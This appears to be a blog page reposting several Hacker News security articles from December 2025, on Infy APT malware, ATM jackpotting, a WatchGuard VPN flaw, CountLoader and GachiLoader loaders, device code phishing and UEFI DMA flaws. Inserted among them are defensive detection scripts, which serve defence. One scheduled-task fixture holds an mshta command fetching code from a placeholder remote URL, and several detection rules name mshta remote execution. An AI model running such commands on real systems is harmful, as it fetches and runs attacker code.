Author: Mark

  • Iranian Infy APT Resurfaces with New Malware Activity After Years of Silence


    Threat hunters have discerned new activity associated with an Iranian threat actor known as Infy (aka Prince of Persia), nearly five years after the hacking group was observed targeting victims in Sweden, the Netherlands, and Turkey.

    “The scale of Prince of Persia’s activity is more significant than we originally anticipated,” Tomer Bar, vice president of security research at SafeBreach, said in a technical breakdown shared with The Hacker News. “This threat group is still active, relevant, and dangerous.”

    Infy is one of the oldest advanced persistent threat (APT) actors in existence, with evidence of early activity dating all the way back to December 2004, according to a report released by Palo Alto Networks Unit 42 in May 2016 that was also authored by Bar, along with researcher Simon Conant.

    The group has also managed to remain elusive, attracting little attention, unlike other Iranian groups such as Charming Kitten, MuddyWater, and OilRig. Attacks mounted by the group have prominently leveraged two strains of malware: a downloader and victim profiler named Foudre that delivers a second-stage implant called Tonnerre to extract data from high-value machines. It’s assessed that Foudre is distributed via phishing emails.


    The latest findings from SafeBreach have uncovered a covert campaign that has targeted victims across Iran, Iraq, Turkey, India, and Canada, as well as Europe, using updated versions of Foudre (version 34) and Tonnerre (versions 12-18, 50). The latest version of Tonnerre was detected in September 2025.

    The attack chains have also shifted from a macro-laced Microsoft Excel file to embedding an executable within such documents to install Foudre. Perhaps the most notable aspect of the threat actor’s modus operandi is the use of a domain generation algorithm (DGA) to make its command-and-control (C2) infrastructure more resilient.

    In addition, Foudre and Tonnerre artifacts are known to validate that the C2 domain is authentic by downloading an RSA signature file, which the malware then verifies (decrypts) using an embedded public key and compares with a locally stored validation file.

    SafeBreach’s analysis of the C2 infrastructure has also uncovered a directory named “key” that’s used for C2 validation, along with other folders to store communication logs and the exfiltrated files.

    “Every day, Foudre downloads a dedicated signature file encrypted with an RSA private key by the threat actor and then uses RSA verification with an embedded public key to verify that this domain is an approved domain,” Bar said. “The request’s format is:

    ‘https://<domain name>/key/<domain name><yy><day of year>.sig.’”
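A defender-side check for the request format Bar describes, added here as an example and not code from the article or SafeBreach: it scans constructed proxy log lines for the `/key/<domain><yy><day of year>.sig` pattern, requires the domain in the file name to match the requested host, and flags when the encoded day disagrees with the request date. The log layout and domain names are assumptions.

```python
import re
from datetime import datetime
from urllib.parse import urlparse

# Constructed web-proxy log excerpt (not from the article or SafeBreach), one request per line:
# "<UTC timestamp> <client IP> <method> <URL>". The domains are placeholders.
SAMPLE_PROXY_LOG = """\
2025-09-14T08:02:11Z 10.0.5.23 GET https://example-c2.test/key/example-c2.test25257.sig
2025-09-14T08:02:14Z 10.0.5.23 GET https://example-c2.test/download/
2025-09-14T08:03:40Z 10.0.5.41 GET https://cdn.example.test/assets/app.js
2025-09-14T09:11:02Z 10.0.5.23 GET https://other-c2.test/key/other-c2.test25001.sig
"""

# Foudre's daily validation request: https://<domain>/key/<domain><yy><day of year>.sig
# The article does not say whether <day of year> is zero-padded, so 1 to 3 digits are accepted;
# the non-greedy domain group leaves the trailing digits to <yy><doy>.
SIG_PATH_RE = re.compile(r"^/key/(?P<domain>[^/]+?)(?P<yy>\d{2})(?P<doy>\d{1,3})\.sig$")


def parse_sig_request(url: str):
    """Return (domain, yy, day_of_year) if the URL matches Foudre's signature-file pattern
    and the domain embedded in the file name equals the host it was requested from, else None."""
    parsed = urlparse(url)
    if parsed.hostname is None:
        return None
    m = SIG_PATH_RE.match(parsed.path)
    if not m or m.group("domain").lower() != parsed.hostname.lower():
        return None
    return m.group("domain"), int(m.group("yy")), int(m.group("doy"))


def date_matches(yy: int, doy: int, when: datetime) -> bool:
    """True if the <yy><day of year> in the file name agrees with the request timestamp."""
    return when.year % 100 == yy and when.timetuple().tm_yday == doy


def find_foudre_sig_requests(log_text: str) -> list:
    """Scan proxy log lines and report every request that fits the Foudre validation pattern.
    date_consistent=False means the file name encodes a different day than the request itself."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines
        ts, client, _method, url = fields
        info = parse_sig_request(url)
        if info is None:
            continue
        domain, yy, doy = info
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        hits.append({"ts": ts, "client": client, "domain": domain,
                     "date_consistent": date_matches(yy, doy, when)})
    return hits


if __name__ == "__main__":
    for hit in find_foudre_sig_requests(SAMPLE_PROXY_LOG):
        print(hit)
```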

    Also present on the C2 server is a “download” directory whose purpose is currently unknown; it is suspected to be used to download and upgrade to a new version.

    The latest version of Tonnerre, on the other hand, includes a mechanism to contact a Telegram group (named “سرافراز,” meaning “proudly” in Persian) through the C2 server. The group has two members: a Telegram bot “@ttestro1bot” that’s likely used to issue commands and collect data, and a user with the handle “@ehsan8999100.”

    While the use of the messaging app for C2 is not uncommon, what’s notable is that the information about the Telegram group is stored in a file named “tga.adr” within a directory called “t” on the C2 server. It’s worth noting that the download of the “tga.adr” file can only be triggered for a specific list of victim GUIDs.

    Also discovered by the cybersecurity company are other older variants used in Foudre campaigns between 2017 and 2020 –

    • A version of Foudre camouflaged as Amaq News Finder to download and execute the malware
    • A new version of a trojan called MaxPinner that’s downloaded by Foudre version 24 DLL to spy on Telegram content
    • A variation of malware called Deep Freeze that, like Amaq News Finder, is used to infect victims with Foudre
    • An unknown malware called Rugissement

    “Despite the appearance of having gone dark in 2022, Prince of Persia threat actors have done quite the opposite,” SafeBreach said. “Our ongoing research campaign into this prolific and elusive group has highlighted critical details about their activities, C2 servers, and identified malware variants in the last three years.”

    The disclosure comes as DomainTools’ continued analysis of Charming Kitten leaks has painted the picture of a hacking group that functions more like a government department, while running “espionage operations with clerical precision.” The threat actor has also been unmasked as behind the Moses Staff persona.

    “APT 35, the same administrative machine that runs Tehran’s long-term credential-phishing operations, also ran the logistics that powered Moses Staff’s ransomware theatre,” the company said.

    “The supposed hacktivists and the government cyber-unit share not only tooling and targets but also the same accounts-payable system. The propaganda arm and the espionage arm are two products of a single workflow: different “projects” under the same internal ticketing regime.”


    Source: thehackernews.com…

  • U.S. DOJ Charges 54 in ATM Jackpotting Scheme Using Ploutus Malware


    Dec 20, 2025 | Ravie Lakshmanan | Cybercrime / ATM Security

    The U.S. Department of Justice (DoJ) this week announced the indictment of 54 individuals in connection with a multi-million dollar ATM jackpotting scheme.

    The large-scale conspiracy involved deploying malware named Ploutus to hack into automated teller machines (ATMs) across the U.S. and force them to dispense cash. The indicted members are alleged to be part of Tren de Aragua (TdA, Spanish for “the train of Aragua”), a Venezuelan gang designated a foreign terrorist organization by the U.S. State Department.

    In July 2025, the U.S. government announced sanctions against the group’s head, Hector Rusthenford Guerrero Flores (aka Niño Guerrero), and five other key members for their involvement in the “illicit drug trade, human smuggling and trafficking, extortion, sexual exploitation of women and children, and money laundering, among other criminal activities.”


    The Justice Department said an indictment returned on December 9, 2025, has charged a group of 22 people for supposedly committing bank fraud, burglary, and money laundering. Prosecutors also alleged that TdA has leveraged jackpotting schemes to siphon millions of dollars in the U.S. and transfer the ill-gotten proceeds among its members and associates.

    Another 32 individuals have been charged in a second, related indictment returned on October 21, 2025, accusing them of “one count of conspiracy to commit bank fraud, one count of conspiracy to commit bank burglary and computer fraud, 18 counts of bank fraud, 18 counts of bank burglary, and 18 counts of damage to computers.”

    If convicted, the defendants could face a maximum penalty of anywhere between 20 and 335 years in prison.

    “These defendants employed methodical surveillance and burglary techniques to install malware into ATM machines, and then steal and launder money from the machines, in part to fund terrorism and the other far-reaching criminal activities of TDA, a designated Foreign Terrorist Organization,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

    The jackpotting operation is said to have relied on the TdA recruiting an unspecified number of individuals to deploy the malware across the nation. These individuals would then conduct initial reconnaissance to assess external security measures installed at various ATMs and then attempt to open the ATM’s hood to check if they triggered any alarm or a law enforcement response.

    Following this step, the threat actors would install Ploutus by either replacing the hard drive with one that came preloaded with the malicious program or by connecting a removable thumb drive. The malware is equipped to issue unauthorized commands associated with the Cash Dispensing Module of the ATM in order to force currency withdrawals.

    “The Ploutus malware was also designed to delete evidence of malware in an effort to conceal, create a false impression, mislead, or otherwise deceive employees of the banks and credit unions from learning about the deployment of the malware on the ATM,” the DoJ said. “Members of the conspiracy would then split the proceeds in predetermined portions.”


    Ploutus was first detected in Mexico in 2013. In a 2014 report, Symantec detailed how a weakness in Windows XP-based ATMs could be exploited to allow cybercriminals to withdraw cash simply by sending an SMS to compromised ATMs. A subsequent analysis from FireEye (now part of Google Mandiant) in 2017 detailed its ability to control Diebold ATMs and run on various Windows versions.

    “Once deployed to an ATM, Ploutus-D makes it possible for a money mule to obtain thousands of dollars in minutes,” it explained at the time. “A money mule must have a master key to open the top portion of the ATM (or be able to pick it), a physical keyboard to connect to the machine, and an activation code (provided by the boss in charge of the operation) in order to dispense money from the ATM.”

    According to the agency, a total of 1,529 jackpotting incidents have been recorded in the U.S. since 2021, with about $40.73 million lost to the international criminal network as of August 2025.

    “Many millions of dollars were drained from ATM machines across the United States as a result of this conspiracy, and that money is alleged to have gone to Tren de Aragua leaders to fund their terrorist activities and purposes,” U.S. Attorney Lesley Woods said.


    Source: thehackernews.com…

  • WatchGuard Warns of Active Exploitation of Critical Fireware OS VPN Vulnerability


    Dec 19, 2025 | Ravie Lakshmanan | Vulnerability / Network Security

    WatchGuard has released fixes to address a critical security flaw in Fireware OS that it said has been exploited in real-world attacks.

    Tracked as CVE-2025-14733 (CVSS score: 9.3), the vulnerability has been described as a case of out-of-bounds write affecting the iked process that could allow a remote unauthenticated attacker to execute arbitrary code.

    “This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer,” the company said in a Thursday advisory.

    “If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.”


    The vulnerability impacts the following versions of Fireware OS –

    • 2025.1 – Fixed in 2025.1.4
    • 12.x – Fixed in 12.11.6
    • 12.5.x (T15 & T35 models) – Fixed in 12.5.15
    • 12.3.1 (FIPS-certified release) – Fixed in 12.3.1_Update4 (B728352)
    • 11.x (11.10.2 up to and including 11.12.4_Update1) – End-of-Life

    WatchGuard acknowledged that it has observed threat actors actively attempting to exploit this vulnerability in the wild, with the attacks originating from the following IP addresses –

    Interestingly, the IP address “199.247.7[.]82” was also flagged by Arctic Wolf earlier this week as linked to the exploitation of two recently disclosed security vulnerabilities in Fortinet FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager (CVE-2025-59718 and CVE-2025-59719, CVSS scores: 9.8).

    The Seattle-based company has also shared multiple indicators of compromise (IoCs) that device owners can use to determine if their own instances have been infected –

    • A log message stating “Received peer certificate chain is longer than 8. Reject this certificate chain” when the Firebox receives an IKE2 Auth payload with more than 8 certificates
    • An IKE_AUTH request log message with an abnormally large CERT payload size (greater than 2000 bytes)
    • During a successful exploit, the iked process will hang, interrupting VPN connections
    • After a failed or successful exploit, the IKED process will crash and generate a fault report on the Firebox
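Detection logic for the two log-message indicators above, added here as an example (not WatchGuard’s or the article’s code) and run over constructed log lines whose field layout is an assumption; the indicator strings and the 2000-byte threshold are the ones the advisory gives.

```python
import re

# Constructed log lines in a generic "<timestamp> <process>: <message>" shape. Real Firebox syslog
# output is laid out differently, so the field parsing (not the indicator strings) is an assumption
# to adapt. The two indicator messages are the ones WatchGuard published; peers are placeholders.
SAMPLE_FIREBOX_LOG = """\
2025-12-18T02:14:07Z iked: IKE_AUTH request from 198.51.100.7 received, CERT payload size=1120
2025-12-18T02:14:09Z iked: Received peer certificate chain is longer than 8. Reject this certificate chain
2025-12-18T02:14:09Z iked: IKE_AUTH request from 198.51.100.7 received, CERT payload size=6144
2025-12-18T02:15:30Z iked: IKE_SA established with 192.0.2.10
2025-12-18T02:16:01Z iked: IKE_AUTH request from 192.0.2.10 received, CERT payload size=1480
"""

CHAIN_TOO_LONG = "Received peer certificate chain is longer than 8. Reject this certificate chain"
CERT_SIZE_RE = re.compile(r"IKE_AUTH request from (?P<peer>\S+) .*?CERT payload size=(?P<size>\d+)")
CERT_SIZE_THRESHOLD = 2000  # bytes; the advisory calls anything larger abnormal


def classify_line(line: str):
    """Return (indicator, peer) when a line matches a published IoC, else None.
    The chain-length message carries no peer address in this sample format."""
    if CHAIN_TOO_LONG in line:
        return ("cert_chain_longer_than_8", None)
    m = CERT_SIZE_RE.search(line)
    if m and int(m.group("size")) > CERT_SIZE_THRESHOLD:
        return ("oversized_cert_payload", m.group("peer"))
    return None


def scan_firebox_log(text: str) -> list:
    """Collect IoC hits in order. A chain-length hit is attributed to the most recent IKE_AUTH
    peer seen (an assumption: the rejection follows that peer's AUTH exchange)."""
    hits, last_peer = [], None
    for line in text.splitlines():
        m = CERT_SIZE_RE.search(line)
        if m:
            last_peer = m.group("peer")
        result = classify_line(line)
        if result:
            indicator, peer = result
            hits.append({"ts": line.split(" ", 1)[0], "indicator": indicator,
                         "peer": peer or last_peer})
    return hits


def peers_to_review(hits: list) -> list:
    """Distinct peer addresses tied to any indicator, for blocking and IR triage."""
    return sorted({h["peer"] for h in hits if h["peer"]})


if __name__ == "__main__":
    found = scan_firebox_log(SAMPLE_FIREBOX_LOG)
    for h in found:
        print(h)
    print("peers to review:", peers_to_review(found))
```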

    The disclosure comes a little over a month after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added another critical WatchGuard Fireware OS flaw (CVE-2025-9242, CVSS score: 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after reports of active exploitation.

    It’s currently not known if these two sets of attacks are related. Users are advised to apply the updates as soon as possible to secure against the threat.

    As temporary mitigation for devices with vulnerable Branch Office VPN (BOVPN) configurations, the company has urged administrators to disable dynamic peer BOVPNs, create an alias that includes the static IP addresses of remote BOVPN peers, add new firewall policies that allow access from the alias, and disable the default built-in policies that handle VPN traffic.


    Source: thehackernews.com…

  • Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware



    Cybersecurity researchers have disclosed details of a new campaign that uses cracked software download sites as the distribution vector for a new version of a modular and stealthy loader known as CountLoader.

    The campaign “uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families,” Cyderes Howler Cell Threat Intelligence team said in an analysis.

    CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.

    The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word and are redirected to a MediaFire link hosting a malicious ZIP archive. That archive contains an encrypted ZIP file and a Microsoft Word document holding the password needed to open the second archive.

    Present within the ZIP file is a renamed legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using “mshta.exe.”


    To establish persistence, the malware creates a scheduled task that mimics Google by using the name “GoogleTaskSystem136.0.7023.12” along with an identifier-like string. It’s configured to run every 30 minutes for 10 years by invoking “mshta.exe” with a fallback domain.

    It also checks if CrowdStrike’s Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI). If the service is detected, the persistence command is tweaked to “cmd.exe /c start /b mshta.exe <URL>.” Otherwise, it directly reaches out to the URL using “mshta.exe.”
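An audit of exported Task Scheduler XML for the persistence pattern just described, added here as an example and not code from Cyderes or the article; the task name, the 30-minute interval and the mshta wrapper follow the description, while the URL and the GUID-like suffix are placeholders.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
URL_RE = re.compile(r"https?://\S+", re.I)

# Constructed task definitions in the Task Scheduler export format (schtasks /query /xml).
# The malicious one mirrors the Cyderes description (Google-like name, PT30M for ~10 years,
# cmd.exe /c start /b mshta.exe <URL>); the URL and GUID-like suffix are placeholders.
MALICIOUS_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\GoogleTaskSystem136.0.7023.12{0F1E2D3C-PLACEHOLDER}</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition>
    <StartBoundary>2025-11-01T09:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c start /b mshta.exe https://fallback.example.invalid/x</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed benign look-alike: Google-style name but a local updater binary and a daily trigger.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\GoogleUpdaterTaskSystem138.0.7194.0{PLACEHOLDER-GUID}</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Program Files (x86)\\Google\\GoogleUpdater\\updater.exe</Command>
    <Arguments>--wake</Arguments>
  </Exec></Actions>
</Task>"""


def iso_duration_minutes(value: str) -> float:
    """Convert a Task Scheduler ISO-8601 duration (PT30M, P3650D, P10Y, ...) to minutes.
    Years and months are approximated as 365 and 30 days; enough for threshold checks."""
    m = re.fullmatch(r"P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return 0.0
    y, mo, d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return ((y * 365 + mo * 30 + d) * 24 + h) * 60 + mi + s / 60


def analyse_task(xml_text: str) -> dict:
    """Return the task name, command and a list of findings matching the CountLoader pattern."""
    root = ET.fromstring(xml_text)
    name = (root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS) or "").lstrip("\\")
    cmd = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS) or ""
    args = root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=NS) or ""
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=NS)
    duration = root.findtext(".//t:Repetition/t:Duration", default="", namespaces=NS)
    full_cmd = f"{cmd} {args}".lower()
    findings = []
    if "mshta" in full_cmd and URL_RE.search(args):
        findings.append("mshta_with_remote_url")
    if "start /b mshta" in full_cmd:
        findings.append("cmd_start_b_wrapper")  # the variant used when Falcon is detected
    if re.match(r"google\w*\d+(\.\d+){3}", name, re.I) and "google" not in cmd.lower():
        findings.append("google_like_name_non_google_binary")
    if 0 < iso_duration_minutes(interval) <= 60 and iso_duration_minutes(duration) >= 365 * 24 * 60:
        findings.append("high_frequency_long_lived_repetition")
    return {"name": name, "command": cmd, "findings": findings}


if __name__ == "__main__":
    for xml_doc in (MALICIOUS_TASK_XML, BENIGN_TASK_XML):
        print(analyse_task(xml_doc))
```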

    CountLoader is equipped to profile the compromised host and fetch the next-stage payload. The newest version of the malware adds capabilities to propagate via removable USB drives and execute the malware directly in memory via “mshta.exe” or PowerShell. The complete list of supported features is as follows –

    • Download an executable from a provided URL and execute it
    • Download a ZIP archive from a provided URL and execute either a Python-based module or an EXE file present within it
    • Download a DLL from a provided URL and run it via “rundll32.exe”
    • Download an MSI installer package and install it
    • Remove a scheduled task used by the loader
    • Collect and exfiltrate extensive system information
    • Spread via removable media by creating malicious shortcuts (LNK) next to their hidden original counterparts that, when launched, execute the original file and run the malware via “mshta.exe” with a C2 parameter
    • Directly launch “mshta.exe” against a provided URL
    • Execute a remote PowerShell payload in memory

    In the attack chain observed by Cyderes, the final payload deployed by the CountLoader is an information stealer known as ACR Stealer, which is equipped to harvest sensitive data from infected hosts.

    “This campaign highlights CountLoader’s ongoing evolution and increased sophistication, reinforcing the need for proactive detection and layered defense strategies,” Cyderes said. “Its ability to deliver ACR Stealer through a multi-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics.”

    YouTube Ghost Network Delivers GachiLoader

    The disclosure comes as Check Point shared details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that’s written in Node.js. The malware is distributed by means of the YouTube Ghost Network, a network of compromised YouTube accounts that engage in malware distribution.

    “One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection,” security researchers Sven Rath and Jaromír Hořejší said. “This technique loads a legitimate DLL and abuses Vectored Exception Handling to replace it on-the-fly with a malicious payload.”

    As many as 100 YouTube videos have been flagged as part of the campaign, amassing approximately 220,000 views. These videos were uploaded from 39 compromised accounts, with the first video dating back to December 22, 2024. A majority of these videos have since been taken down by Google.


    In at least one case, GachiLoader has served as a conduit for the Rhadamanthys information stealer malware. Like other loaders, GachiLoader is used to deploy additional payloads to an infected machine, while simultaneously performing a series of anti-analysis checks to fly under the radar.

    It also verifies whether it’s running in an elevated context by executing the “net session” command. If that command fails, it attempts to restart itself with admin privileges, which, in turn, triggers a User Account Control (UAC) prompt. There is a high chance that the victim will allow it to continue, as the malware is likely to be distributed through fake installers for popular software, as outlined in the case of CountLoader.

    In the last phase, the malware attempts to kill “SecHealthUI.exe,” a process associated with Microsoft Defender, and configures Defender exclusions to prevent the security solution from flagging malicious payloads staged in certain folders (e.g., C:\Users, C:\ProgramData, and C:\Windows).

    GachiLoader then proceeds to either directly fetch the final payload from a remote URL or employ another loader named “kidkadi.node,” which then loads the main malware by abusing Vectored Exception Handling.

    “The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique,” Check Point said. “This highlights the need for security researchers to stay up-to-date with malware techniques such as PE injections and to proactively look for new ways in which malware authors try to evade detection.”


    Source: thehackernews.com…

  • Russia-Linked Hackers Use Microsoft 365 Device Code Phishing for Account Takeovers


    Dec 19, 2025 | Ravie Lakshmanan | Cybersecurity / Cloud Security

    A suspected Russia-aligned group has been attributed to a phishing campaign that employs device code authentication workflows to steal victims’ Microsoft 365 credentials and conduct account takeover attacks.

    The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare.

    The attacks involve using compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe.

    “Typically, these compromised email addresses are used to conduct benign outreach and rapport building related to the targets’ area of expertise to ultimately arrange a fictitious meeting or interview,” the enterprise security company said.


    As part of these efforts, the adversary claims to share a link to a document that includes questions or topics for the email recipient to review before the meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender’s Microsoft OneDrive account and instructs the victim to copy the provided code and click “Next” to access the supposed document.

    Doing so, however, redirects the user to the legitimate Microsoft device code login URL; once the previously provided code is entered, the service generates an access token that the threat actors can then recover to take control of the victim’s account.

    Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. Over the past couple of months, Amazon Threat Intelligence and Volexity have warned of continued attacks mounted by Russian threat actors by abusing the device code authentication flow.

    Proofpoint said UNK_AcademicFlare is likely a Russia-aligned threat actor given its targeting of Russia-focused specialists at multiple think tanks and Ukrainian government and energy sector organizations.

    Data from the company shows that multiple threat actors, both state-aligned and financially-motivated, have latched onto the phishing tactic to deceive users into giving them access to Microsoft 365 accounts. This includes an e-crime group named TA2723 that has used salary-related lures in phishing emails to direct users to fake landing pages and trigger device code authorization.


    The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish.

    “Similar to SquarePhish, the tool is designed to be user-friendly and does not require advanced technical expertise, lowering the barrier for entry and enabling even low-skilled threat actors to conduct sophisticated phishing campaigns,” Proofpoint said. “The ultimate objective is unauthorized access to sensitive personal or organizational data, which can be exploited for credential theft, account takeover, and further compromise.”

    To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users. If that’s not feasible, it’s advised to use a policy that uses an allow-list approach to allow device code authentication for approved users, operating systems, or IP ranges.
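A way to audit an exported set of Conditional Access policies for the mitigation above, added here as an example and not Proofpoint’s or Microsoft’s code: it treats a report-only policy as the weak setting and an enforced all-users block as the corrected one, and reports remaining exclusions as the allow-list the article describes. The policy documents are constructed in the shape of Microsoft Graph’s conditionalAccessPolicy resource; the group id is a placeholder.

```python
# Constructed Conditional Access policies shaped like Microsoft Graph's conditionalAccessPolicy
# resource (conditions.authenticationFlows.transferMethods, grantControls.builtInControls, state).
# The policy names and contents are samples, not an export from a real tenant.
REPORT_ONLY_POLICY = {  # Weak: targets device code flow but is report-only, so nothing is enforced
    "displayName": "CA-ReportOnly-DeviceCode",
    "state": "enabledForReportingButNotEnforced",
    "conditions": {
        "users": {"includeUsers": ["All"], "excludeUsers": []},
        "applications": {"includeApplications": ["All"]},
        "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
    },
    "grantControls": {"operator": "OR", "builtInControls": ["block"]},
}

BLOCK_ALL_POLICY = {  # Corrected: enforced block of device code flow for all users and all apps
    "displayName": "CA-Block-DeviceCodeFlow",
    "state": "enabled",
    "conditions": {
        "users": {"includeUsers": ["All"], "excludeUsers": []},
        "applications": {"includeApplications": ["All"]},
        "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
    },
    "grantControls": {"operator": "OR", "builtInControls": ["block"]},
}

ALLOW_LIST_POLICY = {  # Fallback from the article: block, but exempt an approved group (placeholder id)
    "displayName": "CA-Block-DeviceCodeFlow-ExceptApproved",
    "state": "enabled",
    "conditions": {
        "users": {"includeUsers": ["All"], "excludeGroups": ["00000000-0000-0000-0000-000000000000"]},
        "applications": {"includeApplications": ["All"]},
        "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
    },
    "grantControls": {"operator": "OR", "builtInControls": ["block"]},
}

MFA_POLICY = {  # Unrelated: requires MFA, no authenticationFlows condition at all
    "displayName": "CA-Require-MFA",
    "state": "enabled",
    "conditions": {"users": {"includeUsers": ["All"]}, "applications": {"includeApplications": ["All"]}},
    "grantControls": {"operator": "OR", "builtInControls": ["mfa"]},
}


def targets_device_code(policy: dict) -> bool:
    """True if the policy's Authentication Flows condition includes deviceCodeFlow
    (transferMethods is a comma-separated string in Graph)."""
    flows = policy.get("conditions", {}).get("authenticationFlows") or {}
    methods = {m.strip() for m in (flows.get("transferMethods") or "").split(",")}
    return "deviceCodeFlow" in methods


def is_enforced_block(policy: dict) -> bool:
    controls = (policy.get("grantControls") or {}).get("builtInControls") or []
    return policy.get("state") == "enabled" and "block" in controls


def device_code_exposure(policies: list) -> dict:
    """Summarise device code flow coverage across a tenant's CA policies.
    status: 'not_blocked', 'blocked' (some enforced policy covers all users and apps with no
    exclusions) or 'blocked_with_exceptions' (only allow-list style blocks exist)."""
    report_only = [p["displayName"] for p in policies
                   if targets_device_code(p) and p.get("state") == "enabledForReportingButNotEnforced"]
    enforced = [p for p in policies if targets_device_code(p) and is_enforced_block(p)]
    exceptions, fully_covering = [], 0
    for p in enforced:
        before = len(exceptions)
        users = p["conditions"].get("users", {})
        apps = p["conditions"].get("applications", {})
        if users.get("includeUsers") != ["All"]:
            exceptions.append(f"{p['displayName']}: not scoped to all users")
        for key in ("excludeUsers", "excludeGroups", "excludeRoles"):
            if users.get(key):
                exceptions.append(f"{p['displayName']}: {key}={users[key]}")
        if apps.get("includeApplications") != ["All"]:
            exceptions.append(f"{p['displayName']}: not scoped to all applications")
        if (p["conditions"].get("locations") or {}).get("excludeLocations"):
            exceptions.append(f"{p['displayName']}: excludeLocations present")
        if len(exceptions) == before:
            fully_covering += 1
    if not enforced:
        status = "not_blocked"
    elif fully_covering:
        status = "blocked"
    else:
        status = "blocked_with_exceptions"
    return {"status": status, "report_only": report_only, "exceptions": exceptions}


if __name__ == "__main__":
    for tenant in ([REPORT_ONLY_POLICY, MFA_POLICY], [BLOCK_ALL_POLICY, MFA_POLICY], [ALLOW_LIST_POLICY]):
        print(device_code_exposure(tenant))
```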


    Source: thehackernews.com…

  • New UEFI Flaw Enables Early-Boot DMA Attacks on ASRock, ASUS, GIGABYTE, MSI Motherboards


    Dec 19, 2025 | Ravie Lakshmanan | Firmware Security / Vulnerability

    Certain motherboard models from vendors like ASRock, ASUSTeK Computer, GIGABYTE, and MSI are affected by a security vulnerability that leaves them susceptible to early-boot direct memory access (DMA) attacks across architectures that implement a Unified Extensible Firmware Interface (UEFI) and input–output memory management unit (IOMMU).

    UEFI and IOMMU are designed to establish a security foundation and prevent peripherals from performing unauthorized memory accesses, effectively ensuring that DMA-capable devices cannot manipulate or inspect system memory before the operating system is loaded.

    The vulnerability, discovered by Nick Peterson and Mohamed Al-Sharifi of Riot Games in certain UEFI implementations, has to do with a discrepancy in the DMA protection status. While the firmware indicates that DMA protection is active, it fails to configure and enable the IOMMU during the critical boot phase.


    “This gap allows a malicious DMA-capable Peripheral Component Interconnect Express (PCIe) device with physical access to read or modify system memory before operating system-level safeguards are established,” the CERT Coordination Center (CERT/CC) said in an advisory.

    “As a result, attackers could potentially access sensitive data in memory or influence the initial state of the system, thus undermining the integrity of the boot process.”

    Successful exploitation of the vulnerability could allow a physically present attacker to inject pre-boot code on affected systems running unpatched firmware and to access or alter system memory via DMA transactions, well before the operating system kernel and its security features are loaded.

    The vulnerabilities that enable a bypass of early-boot memory protection are listed below –

    • CVE-2025-14304 (CVSS score: 7.0) – A protection mechanism failure vulnerability affecting ASRock, ASRock Rack, and ASRock Industrial motherboards using Intel 500, 600, 700, and 800 series chipsets
    • CVE-2025-11901 (CVSS score: 7.0) – A protection mechanism failure vulnerability affecting ASUS motherboards using Intel Z490, W480, B460, H410, Z590, B560, H510, Z690, B660, W680, Z790, B760, and W790 series chipsets
